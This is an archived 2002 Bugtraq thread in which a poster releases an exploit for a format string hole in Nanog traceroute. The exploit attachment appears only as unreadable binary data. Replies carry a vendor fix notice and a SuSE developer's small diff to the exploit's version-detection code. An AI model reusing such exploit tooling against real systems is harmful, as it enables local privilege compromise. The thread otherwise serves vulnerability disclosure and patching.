8761593 2002-07-21 14:09 +0200  /14 rader/ SpaceWalker <spacewalker@minithins.net>
Sänt av: joel@lysator.liu.se
Importerad: 2002-07-23  00:12  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: vuln-dev@securityfocus.com
Mottagare: Bugtraq (import) <23174>
Ärende: Nanog traceroute format string exploit.
------------------------------------------------------------
From: SpaceWalker <spacewalker@minithins.net>
To: bugtraq@securityfocus.com
Cc: vuln-dev@securityfocus.com
Message-ID: <20020721140924.2584c3cf.spacewalker@minithins.net>

Hello, As the vulnerability has been published some weeks ago, and no
working exploit has been released (the perl exploit was joke) I
decided to release my private exploit.  I do it only because -This
exploit will never be used to haxor something because I never saw
this traceroute used by default
-This exploit find offsets "by the proper way" and doesn't place the
target adresses in the format string. (and is interresting to study
for beginners).

Have phun, please don't haxor with it.
SpaceWalker
(8761593) /SpaceWalker <spacewalker@minithins.net>/(Ombruten)
Bilaga (application/octet-stream) i text 8761594
Kommentar i text 8766598 av Ryan Mansager <rmger@nrez.net>
Kommentar i text 8769890 av Olaf Kirch <okir@suse.de>
8761594 2002-07-21 14:09 +0200  /16 rader/ SpaceWalker <spacewalker@minithins.net>
Bilagans filnamn: "tracerouteexp.tgz"
Importerad: 2002-07-23  00:12  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: vuln-dev@securityfocus.com
Mottagare: Bugtraq (import) <23175>
Bilaga (text/plain) till text 8761593
Ärende: Bilaga (tracerouteexp.tgz) till: Nanog traceroute format string exploit.
------------------------------------------------------------
‹q£:=íýwÛ6®¿Ú§5­œÈ¶$ÇiÇݲ6Ýv/[÷–ômﺼ<Ù¢m5²èÓGœléþöR_¶³Û^×ëÝÌö%	 €Ä¤±7æ±ÈRÎoÝI³í}ûI¿¿mçIßÆ߶³¿/«öœƒ¾ëô÷Ý0èÚ½¬ÿ×°SmY’z1c’bé…W<ÞÇãäC0ôa[ZÙÿ¹Dñû¦a;¶}@û½fÿ'=÷ ´ÿ0îôÝ'O0û}3²®ýÍ÷¿»ËÎgAÂàÿ‹S&&l‘Â ™qŸ%"‹Çœ…ÏÙ$söü»³F£±ÛmÂ4sÜrmÛÅ>f.—ËÎ<ˆ‚tDI'âi«ÑÈ!ŸçóÏ
!74À§A43€8JR?Ù³RWÐ[탎0Õún“nz»àÉj7ìoºÚ»ô‚zoѴڗs^é1ÀJ:3£ÉoRGl<ÝÙÝåÑu‹hÐüÔç“ âìË×/_žüpzòë9¬Ñœ¿pn:ã¬}ÎFÙdÂaj7ŸòíñOÇ/^È9®-§$¥)žïÇ̋cï¶<çÅÉËãקç—_¿:;gF(Æ^8Ij0˜]6˘.½Û„-E|•¬Ás~üÃW'€©;sÞ-YD·À֎¼HLÛ»#â`Z1r|ç'g縘3fCûšÑDMø*#/d×^œtØëix‚H‰\‰9–—6P`¨S^·z6QSÍ JÙ5G"áC›^A+½ˆ×:}Ð-/ó¡Cï^L#=˜,ƒtF ß!÷Žjƒ=Y”,˜H(¢)‹y
2&81™$Àd_M‹Ä"ÊæCð€
mÇ|bÏ#>
"‹žyä[¤OcD
êÅ[¿61€$ðÂä*tc"bs §
a=îí!t#˜˜&¡<-i{{‚жìÅܻ‘wH-Í@­x}§äÊoø6Wq´ç^ªXF¥äIÂ$üM|˜(ÇH¿ß8¶»1 Á0Kôè.Ð!ˆ¼g‘âóĦ<I/‰Œ©¨twÀüîõé)¾Î!°ï›ß"„ìáÐ8„†~|†5ä,e´;O'¦qÇ"fËYr†HÀúŽ„o,8Ž™vS¿²m§¥¥ÖX/äžûCØÚñ,6ï+Ò86”—©ïîî‚r°;ØXiá´VöùçŸÿáØN̨E­ã`×DUB‚€_Rc{Ìa-dG’Ý•tí¢àÓ51pú£X\ñ¨£^#’ïÓpâH3ä’líI(\ôâÖÌ-äšTÞh­Q¾Ðû»bE¸ÓÈp>ÌJË8HÉë#©cå‰+/”ځÍXoåÔ²×ô´ç^aÁ^jßÆuŒ~ç¦QuÑ›v$ÍLSñÎ1ûƒš	´V‹=czäÙ3ç ¥MTù!i~å­!ŸzÈfÁtƼW³wf<ÁM“š²³3‹Ø!3p¶±ÓyÞ0T•\~¸w°þ¡‰’hi•Cø¯Fj€’Ó;0ÁÂæ¾ÐQz.QpäåzHRJz.±AÛ34ånµ@PŠý*¤Fï <É_›6¼ÕR«â½+RK)Ècg–±R•üU¹|GA¡œOAZe©)5zôT®I.µçí‘Ö´·°\‘š:¬l“¡t<LxãWq¢ÕP;;ÿ&gBÛÙý‹\qŠ´ÒÊòÀ
¹ÿá&ë£n/¸V‰’.`·2ÀÂÚJ‡EnP
4q49ˆ‘B~EX6ºaaù´ßù™½G§fK›%Ò®Þ¸}´KiÑ»øûµ]+çS,ÃPNLztí©h¬u”GdR²µ‰LΣ·79$Úw£Y³×’¹îj7J‘£ò؊`î:ÔR,·¯h(ÑÁ†4žb?4¬R&½b2P¶Ûz¤å"'_÷ɍSùz=”LJ½ŽîÝsÕ>¢¶²_›k&JÕ™j^>à’'¬È]qÚ:*âÚu%ɗ}à÷1‡D„ƒggì±[<®b!@ʨ,Ž>ªð`ÍC²Ê!÷½ìfiø»â·ˆ,ô²h<“Té§>ó€*©Q
¯	BpA¨JóqÑïRå!ìõ/µ‘âcþ#g3ïšK’€»Pdþ­ÅR/¹B–p’Õ;“L‚8I1R&P>¬öó¤’…ˆ^‹£´¬×]µpÜwìÍhù2`™L ¨™Á6úÓËÕ&1D&¦Bw6æè퓲ےŽ{qž˜›­—<fAêûÇä,5居«1¢}kîɆûë<ޝty7ë~°pˆNñè2„¬j´ò’ë=‰&Oú¬£½‰Êø7YîŽrxãŸFÅOçyfµÊ_T·¹5è›B‘s€)Zåt mê¤@-» ý»6áԈ4¼©âgøoê1ØË}‡þÝ-ŠJ»¯©ZGÁm£¬(e¡_?GJÁÊ^ç¥ÈÀÁ—ïø”ÂÃÏ¥sӒJ1cÎÍÊ
Ê!?Ï7-Ǩ-…µI“’ÄÞ°W	#X0i¬¢*Är/*§Ž
BÕõl¦»»õtV…_'ãædVEó®î-É_f‰7å2@лð{ N먊B
n˜½iÏ–.à	‚}™ÿãs¤òj|*åÆç%þ¸–?®/”›ÓdäP¢“N·T è4}êé°|âe!’²–Ke„Ä€‚È‹å!£ŽŽÍ8¨fQÆBÌ zÐQ~uj렕ÀÓéï#c­“ü5€*K€€ø_É<ó^<â˜ÏGÙt
fߪÍ_Â<cé(¥SuÄa
Wg*ºŠê‘ZÊ"ß5Ë!¡7
i×AͲ1FN`ry‚(Ë'WRk«ÕLÃ1ìY-'`fHLÚë‘òVPOCR•Ú­Ét¥mÐäN’^αdùˆ]~söú›­uyôȓi†,FŸdt%r°»À_`Höɐ݃Š%¦³£[Xþ2½óZÆzuþõÄøRÄ üäÒqƒÖ‘Âzäq’dsƜa|&@ñbun!hÆ.÷ñóÃã÷|7]yÄM*„æˆæ•ØWµˆM…@Z/±äÚ1’$W™¸ÂpŒ+¦8wD/ýTėü•ôc‚X[R(y~vpn¢sÐ
%–éØ7žID˜¶oò–úd´V-˜wÐvnèŸa¥âì½µ3e` x&ôR/Ψƒ86–‘È~órÙº¡Œä…Þ”‹"apÍ·¹/UØoù™E+0ôêaý­ËO@wŸ>}Èjó}R'ƒ‚¾‡ÀX(Ò-pL8°†‹''¬¨¨¿m WÆ·„CÀb×Yñ­¶É?3ð¡ú„@=åѵiœ}}rzúüՋ! ë?‚
sž"×àiæ(¨¹©*HzžñCƖðK±HњLYK§cU&ޅçk]"pÅ­
ã0ɔÀeÑ¡8\^ÏÓC.øȶÌ1(Çef
W0ÆôîqôøÃU`÷R˜€°PH–—µ
Z´ªÎo†nä3–4£T÷wÖ!¾&°Z(ݨ~p ™y²Sí®!L
¡úØAL®ƒ›œüZ²ʧä°zì½kÖC2¹hÚ)ôw¹Ê”Ê7²o 4N×GIð{*ûPßZð¹æšÖž#«¦s>ɓFZ4ײo>³KEä‡z£B<k3êA¾Í!©#~ÆÞ¤…°QkÌ¥°deЪ‰År(ÆAfPu¯ßؤ½ê;`9z¢!æí"V‚“ŽlËR“WB&=ù´×KÙAÇf_½:}^+>~~rVú¦G…‘J쥧–¾Îvó³}Û?R«Õ”Šñæ¶XBv–òsÀ­Â9‰K&刎ÐTB¼Ú\Wº~b©<:¬dx­€R›ß¨…ÙÌË@y©qÐ,tú]ó¿ýUý§Uï|ë]ñ
øæ÷Kãþû¶½ïÈûðÛî÷Ý}¼ÿqÐÛßÞÿøíùËÓã¯Îàœ²ö+—µçÞl¾úò'ÏÏ¡[^l!“ÓëuD“Ù!+’õ&Ì<dM•â6_ðñL0Ã7ò·Jz¸f€ZËXÎúÖ}fŽñ*žñt<föç£åÁ18¶μxÎړÒ@
šívÆ¿1­ê¿ÁëœýÖüúªýÓ>¿ï`ëì_Þù£Öëï÷òû_ûOÐþ{Žó‘Ù?µ‚ŸÜ>ªû_Á4ò•Ë^öNãHüɛ_úžWõ¢Åäƒj'àƒMÂJµ/£¯¹H³ˆ¬|΋ˆ%ož`­K>ÙC
£»œ‹¡Ñþ—¡_]xuò·žç¯ûÃü+­ìè_‰mz=¸áoÕªj–ƒÚ‰
Ê@Ú
\Ë8q|kU"3æ¥)Ÿ/RȄƒ0ä~gµ$ˆ)‡L¹rñ;R‘àوãBÍn·zËÈ}Z|+$'ÓÀÿà2\
2+ÀljW&¥äÌÄUL¡2‹Û’-*›gø•R‰
¹¥rÁÑú1]@pÙ'Î
Zd¸Ò…ªÁùÙÂUÀ΅uvþâÕëó˗ߜž|÷Jeó÷íq£Û­o³,£ªañ]¨T”«mn™]碔¥éPÚI©Úí¥<t”ŒÅ|QAÍ.†¿ÝQu“™aí±a)8EþNí5Èd@";2¹ùr;Ôò’U7ÄÌêû¡ñ¤»¸1AÄ´`õ(ˆÖÉÇáü,[°º"ÛUšóT&…Ká='üÎ/ãúNøtFÉP~ßʅ\pSs±Ì…šòò@µ”©¬
ŸÊÕ=‚õÛQnÿEšDÕo­ÐmbôÖÏæÖ~«Ëí3Ü;–‚`íˆ9†%
†n7æs)üxú—äîMUÆÌ¡øÞ›3ñÙÊkëG;ªÝûnZõ"åja²Zø(—9+µQ~`LEêÕ*™í¶j×üØã–Eפ`£¯ÒŠŠ”äGžŒVã?yê½w¿—ÿ¹ô÷˜ÿ¹=ÿþ£ï¸[ü÷šÿmt­Á†3ÚªŒ¯
n
ZXT+à
þŽ×ÇÕêöOùýÙ{¥ñ{ößïÿ³o;²þsp°µÿÑ
’TáJqã@ÞAƒ(»aß÷\FY\I@_TR=ïø^ê5;ÓPŒBV7óf½ã°yv¸wcá&Äì¡Û³v¼PŒpdt#]ÌCûæ©]›±È€á|îOÐï«~˜pðôIϝpê=Ÿ¸îĝ”'ŒÊˆÔÓ¨‚r¬˜s‹!w9?
ɹ`ÄP¸ùúÏu
Q¢lÔýPÃØz»mÛ¶mÛ¶mÛ¶mÛ¶mÛ¶mÛ¶mÛ¶mÛ¶mÛ¶mÛ¶mû@íߏj&úP
(8761594) /SpaceWalker <spacewalker@minithins.net>/(Ombruten)
8766598 2002-07-23 16:01 -0700  /34 rader/ Ryan Mansager <rmger@nrez.net>
Sänt av: joel@lysator.liu.se
Importerad: 2002-07-24  01:05  av Brevbäraren
Extern mottagare: SpaceWalker <spacewalker@minithins.net>
Extern kopiemottagare: bugtraq@securityfocus.com
Extern kopiemottagare: vuln-dev@securityfocus.com
Mottagare: Bugtraq (import) <23198>
Kommentar till text 8761593 av SpaceWalker <spacewalker@minithins.net>
Ärende: Re: Nanog traceroute format string exploit.
------------------------------------------------------------
From: Ryan Mansager <rmger@nrez.net>
To: SpaceWalker <spacewalker@minithins.net>
Cc: bugtraq@securityfocus.com, vuln-dev@securityfocus.com
Message-ID: <20020723230136.GA69546@beau.nrez.net>


----- Forwarded message from Ehud gavron <gavron@wetwork.net> -----

From: Ehud gavron <gavron@wetwork.net>
Subject: New NANOG traceroute (fixes -T compromise)
To: nanog@merit.edu
Date: Tue, 23 Jul 2002 15:03:34 -0700
Organization: WetWork


The new NANOG traceroute (also known as TrACESroute)
is now available.  It fixes the latest "security" compromise
detailed on Bugtraq and on SUSE security focus at
http://online.securityfocus.com/advisories/2740

Ehud Gavron
gavron@wetwork.net

Directory:
ftp://ftp.login.com/pub/software/traceroute/beta/

Code:
ftp://ftp.login.com/pub/software/traceroute/beta/traceroute.c

Directions:
ftp://ftp.login.com/pub/software/traceroute/beta/0_readme.txt
(8766598) /Ryan Mansager <rmger@nrez.net>/----------
8769890 2002-07-24 14:43 +0200  /26 rader/ Olaf Kirch <okir@suse.de>
Sänt av: joel@lysator.liu.se
Importerad: 2002-07-24  20:35  av Brevbäraren
Extern mottagare: SpaceWalker <spacewalker@minithins.net>
Extern kopiemottagare: bugtraq@securityfocus.com
Extern kopiemottagare: vuln-dev@securityfocus.com
Mottagare: Bugtraq (import) <23209>
Kommentar till text 8761593 av SpaceWalker <spacewalker@minithins.net>
Ärende: Re: Nanog traceroute format string exploit.
------------------------------------------------------------
From: Olaf Kirch <okir@suse.de>
To: SpaceWalker <spacewalker@minithins.net>
Cc: bugtraq@securityfocus.com, vuln-dev@securityfocus.com
Message-ID: <20020724144310.F7080@suse.de>

On Sun, Jul 21, 2002 at 02:09:24PM +0200, SpaceWalker wrote:
> -This exploit will never be used to haxor something because I never
> saw this traceroute used by default

Well, SuSE has been using Nanog traceroute for ages; at least
since 7.0 but probably longer.

OTOH, the bug isn't very new either.  The nktib package in SuSE Linux
7.0 has a patch for this vulnerability dated 2000/10/03 14:12:43.

Finally, let me remark that your exploit has a minor bug in detecting
vulnerable versions. Using the attached patch it will properly
recognize patched versions of traceroute :)

Cheers
Olaf
-- 
Olaf Kirch     |  Anyone who has had to work with X.509 has probably
okir@suse.de   |  experienced what can best be described as
---------------+  ISO water torture. -- Peter Gutmann
(8769890) /Olaf Kirch <okir@suse.de>/---------------
Bilaga (text/plain) i text 8769891
8769891 2002-07-24 14:43 +0200  /12 rader/ Olaf Kirch <okir@suse.de>
Importerad: 2002-07-24  20:35  av Brevbäraren
Extern mottagare: SpaceWalker <spacewalker@minithins.net>
Extern kopiemottagare: bugtraq@securityfocus.com
Extern kopiemottagare: vuln-dev@securityfocus.com
Mottagare: Bugtraq (import) <23210>
Bilaga (text/plain) till text 8769890
Ärende: Bilaga till: Re: Nanog traceroute format string exploit.
------------------------------------------------------------
--- main.c	Wed Jul 24 14:41:38 2002
+++ tracerouteexp/main.c	Sun Jul 21 14:04:48 2002
@@ -266,7 +266,7 @@
 	readbuf[lus]=0;
 	if(insaneverbose)
 		printf("*** result of  first try : %s\n",readbuf);
-	if(strstr(readbuf,"%x%x%x%x")){
+	if(strstr(readbuf,"%x%x%x%x%x")){
 		printf("*** fatal : This version is patched\n");
 		exit(-1);
 		}
(8769891) /Olaf Kirch <okir@suse.de>/---------------